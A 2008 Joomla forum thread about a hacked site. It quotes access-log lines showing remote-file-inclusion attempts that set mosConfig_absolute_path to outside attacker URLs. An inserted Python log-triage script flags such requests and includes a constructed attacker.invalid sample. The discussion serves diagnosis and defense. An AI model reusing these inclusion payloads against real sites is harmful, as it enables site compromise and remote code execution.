Author Topic: Hacked?  (Read 5693 times)
aussiemike
« Reply #30 on: February 20, 2008, 11:46:58 pm »

I changed the register globals on February 10, 2008, straight after I asked the question in the forum. My hosts then told me within 24 hours that the emails were being sent again and suspended my account again.

Here is a line from the log file, a copy of which I will send to your email:
74.50.11.15 - - [09/Feb/2008:23:49:38 +1100] "GET /component/option,com_facileforms/Itemid,38//use/components/com_facileforms/facileforms.frame.php?&mosConfig_absolute_path=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.808"

The file facileforms.frame.php does not exist on the site.

This is the line created when the exploit entered my site. It stopped as soon as I had uninstalled sh404SEF.
shumisha
« Reply #31 on: February 21, 2008, 07:58:54 am »

Hi,

So, reading this line from your log, I would say you may have removed one of your possible protections by removing sh404SEF. Anyway, this line is not involved in your problem. As you can see by reading the log, someone requested the file:
/component/option,com_facileforms/Itemid,38//use/components/com_facileforms/facileforms.frame.php

trying to additionally insert the ?$mosConfig_absolute_path=http://bogorhacker.co.cc/irc/irc.txt??

which would have caused a remote file to be included, should you have been using an older version of Facile Forms, which was subject to this vulnerability.
However, your server responded to this request with a 403 code (...HTTP/1.1" 403 - "-" "libwww-perl/5.808"...), which is the code for "Forbidden access", which means the request was denied and nothing happened there.
My best guess is that you are using the Joomla standard .htaccess, which includes protection against this kind of attack, though I don't remember if it was already there in Joomla 1.0.11.
Alternatively, if you are using a recent version of sh404SEF, it may also have been sh404SEF blocking this attack.

The reason for what you are seeing is not in Facile Forms, at least if this line in the log is why you thought FF was involved.

You have not stated clearly which version of sh404SEF you were using, aside from 'the most recent'. What version was it?

Regards
aussiemike
« Reply #32 on: February 21, 2008, 10:48:25 am »

I was using version 1.3RC and yes, I was using the standard Joomla .htaccess (is this not the correct thing to do?)
shumisha
« Reply #33 on: February 21, 2008, 11:37:05 am »

Hi,

Yes, it is correct to do:
Quote
Joomla standard .htaccess, which includes protection against this kind of attack, though I don't remember if it was already there in Joomla 1.0.11
Protection against this kind of attack was added in the Joomla standard .htaccess, but I don't remember in which version.

Anyway, the point I was trying to make is this line shows that an attack targeting "...components/com_facileforms/facileforms.frame.php" was launched against your site. However, this attack failed because it was blocked either by Joomla .htaccess or by sh404SEF (resulting in a 403 error being displayed to the attacker). Additionally, even if you did not have the protection of either Joomla .htaccess or sh404SEF, this attack would have failed anyway because it was targeting an older version of Facile Forms. The target file (facileforms.frame.php) is no longer part of Facile Forms in FF 1.4.7.

The general conclusion is that you have not yet identified the origin of the problem you are (were) suffering from!

Regards
aussiemike
« Reply #34 on: February 21, 2008, 11:55:59 am »

Hi
I have just had the site suspended again due to the same problem, without having sh404SEF installed. I will have raw logs for this problem as soon as the providers allow me access to cPanel.

My apologies to all concerned; it appears that sh404SEF was secure after all.

If anyone is good at finding a security problem with my Joomla site, I could use some help, which would be appreciated ($).
aussiemike
« Reply #35 on: February 21, 2008, 01:43:02 pm »

I have just checked the raw log files again and found the following line:

Quote
202.60.64.18 - - [20/Feb/2008:01:55:56 +1100] "GET /index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://communityflow.com/xxxxx/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"

Does this mean anything to anyone? I went to the web address shown and my antivirus quarantined a suspect file, so please don't go there.
shumisha
« Reply #36 on: February 21, 2008, 02:21:41 pm »

Hi,

Same thing: this was an attack against a possibly vulnerable component, but it was rejected (Access Forbidden), as can be seen from the response code (403). If the request had been accepted (and therefore might have caused some damage), the response code would be 200 (meaning: OK).

Regards
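As an added illustration of shumisha's point in Replies #31 and #36 (this is not code from the thread, nor from Facile Forms, sh404SEF or Joomla), here is a small Python triage script that parses Apache combined-format access-log lines, flags requests whose query string passes a remote URL in a parameter such as mosConfig_absolute_path, and separates those the server answered with 403 from those answered with 200, which are the ones worth investigating. The first two sample lines are the ones quoted in this thread; the last two, including their IPs, hostnames and component name, are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log format, the layout of the lines quoted in this thread.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<agent>[^"]*)"$'
)

# A parameter value that starts with a URL scheme is the signature of a remote-file-include
# attempt against a PHP include path such as mosConfig_absolute_path.
REMOTE_SCHEMES = ("http://", "https://", "ftp://")

def parse_line(line):
    """Split one access-log line into named fields; returns None if the line is malformed."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def rfi_params(target):
    """Return (name, value) pairs from the query string whose value is a remote URL."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if v.lower().startswith(REMOTE_SCHEMES)]

def classify(line):
    """'clean', or for an RFI-looking request: 'blocked' (403), 'served' (200) or 'other'."""
    rec = parse_line(line)
    if rec is None or not rfi_params(rec["target"]):
        return "clean"
    status = rec["status"]
    if status == "200":
        return "served"    # the include may have run: inspect the webroot for dropped files
    if status == "403":
        return "blocked"   # rejected by a query-string filter such as Joomla's .htaccess
    return "other"         # e.g. 404 or 500: review individually

# Sample input: lines 1-2 are quoted in this thread; lines 3-4 are constructed for this example.
SAMPLE_LINES = [
    '74.50.11.15 - - [09/Feb/2008:23:49:38 +1100] "GET /component/option,com_facileforms/Itemid,38//use/components/com_facileforms/facileforms.frame.php?&mosConfig_absolute_path=http://bogorhacker.co.cc/irc/irc.txt?? HTTP/1.1" 403 - "-" "libwww-perl/5.808"',
    '202.60.64.18 - - [20/Feb/2008:01:55:56 +1100] "GET /index2.php?option=com_sefservicemap&Itemid=&mosConfig_absolute_path=http://communityflow.com/xxxxx/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 403 - "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Win32)"',
    '198.51.100.7 - - [21/Feb/2008:03:12:09 +1100] "GET /index.php?option=com_example&mosConfig_absolute_path=http://attacker.invalid/remote.txt? HTTP/1.1" 200 512 "-" "libwww-perl/5.808"',
    '203.0.113.5 - - [21/Feb/2008:03:15:00 +1100] "GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" 200 8843 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line in SAMPLE_LINES:
        rec = parse_line(line)
        print(classify(line), rec["ip"], rfi_params(rec["target"]))
```

A "served" verdict does not prove the include executed (the component may not have used the parameter), but it is the case the thread's 403 reasoning cannot rule out.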
aussiemike
« Reply #37 on: February 21, 2008, 05:57:04 pm »

Well, I am totally lost on how it is happening. I think I will have to purchase a component to protect the site and hope that works.
shumisha
« Reply #38 on: February 21, 2008, 06:06:07 pm »

Hi,

I would advise you to first clear things up. If mails are still being sent, it means a script was installed on your server. You have to find that hidden script. Having a sec. component would be useless, as it can only protect entry, but won't prevent already installed scripts from operating.
If you have SSH access and know a little bit of Linux commands (are you on Linux or Windows?), you should be able to find it by looking for unusual files.
I suggest you go now to forum.joomla.org and look for the FAQ section and sticky posts dealing with "You have been hacked". There are also small programs you can install that will check for unusual files.

Hope this helps

Regards
aussiemike
« Reply #39 on: February 21, 2008, 11:34:20 pm »

Thanks Shumisha.
I think I will pull the whole site down and start afresh with additional security. I am on UNIX and it is shared, so I don't think I have SSH, and I wouldn't know where to start. I guess this is a good time to learn.

Thank you again.
aussiemike
« Reply #40 on: March 04, 2008, 12:51:44 am »

I would just like to let everyone know that it was NOT Facile Forms or sh404SEF that was insecure on my site but Joomla itself. Unfortunately I was one of the early sites to be attacked while using Joomla! 1.0.13.

I found a virus had been uploaded onto the site.

Thank you to everyone who tried to help me, and I apologise for any inference that there was an insecurity in either component.